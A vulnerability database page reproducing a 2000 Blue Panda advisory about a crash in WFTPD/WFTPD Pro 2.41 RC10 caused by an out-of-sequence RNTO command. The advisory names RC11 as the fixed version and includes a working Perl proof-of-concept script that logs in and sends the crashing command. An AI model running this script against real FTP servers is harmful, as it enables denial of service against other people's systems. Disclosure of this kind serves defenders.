Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

wftpd241.txt

🗓️ 11 Jul 2000 00:00:00Reported by Blue PandaType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 28 Views

WFTPD Pro 2.41 RC10 crashes from out of sequence RNTO command by authenticated users.

Code
`================================================================  
BluePanda Vulnerability Announcement: WFTPD/WFTPD Pro 2.41 RC10  
11/07/2000 (dd/mm/yyyy)  
  
[email protected]  
http://bluepanda.box.sk/  
================================================================  
  
Problem: An out of sequence RNTO command will cause WFTPD to crash.  
Vulnerable: WFTPD/WFTPD Pro 2.41 RC10, and prior.  
Immune: WFTPD/WFTPD Pro 2.41 RC11.  
  
==========  
Details:  
==========  
  
Anyone with a valid user/pass combination for a WFTPD server can cause it to  
terminate abnormally by issuing an RNTO command without first using RNFR.  
  
===================  
Proof of concept:  
===================  
  
#!/usr/bin/perl  
#  
# WFTPD/WFTPD Pro 2.41 RC10 denial-of-service  
# Blue Panda - [email protected]  
# http://bluepanda.box.sk/  
#  
# ----------------------------------------------------------  
# Disclaimer: this file is intended as proof of concept, and  
# is not intended to be used for illegal purposes. I accept  
# no responsibility for damage incurred by the use of it.  
# ----------------------------------------------------------  
#  
# Issues an RNTO command without first using RNFR, causing WFTPD to crash.  
#  
  
use IO::Socket;  
  
$host = "ftp.host.com" ;  
$port = "21";  
$user = "anonymous";  
$pass = "p\@nda";  
$wait = 10;  
  
# Connect to server.  
print "Connecting to $host:$port...";  
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";  
print "done.\n";  
  
# Login and issue premature RNTO command.  
print $socket "USER $user\nPASS $pass\nRNTO x\n";  
  
# Wait a while, just to make sure the commands have arrived.  
print "Waiting...";  
$time = 0;  
while ($time < $wait) {  
sleep(1);  
print ".";  
$time += 1;  
}  
  
# Finished.  
close($socket);  
print "\nConnection closed. Finished.\n"  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 Jul 2000 00:00Current
7.4High risk
Vulners AI Score7.4
wftpd pro 2.41vulnerability announcementdenial-of-servicecommand sequenceproof of conceptcrash issue.
28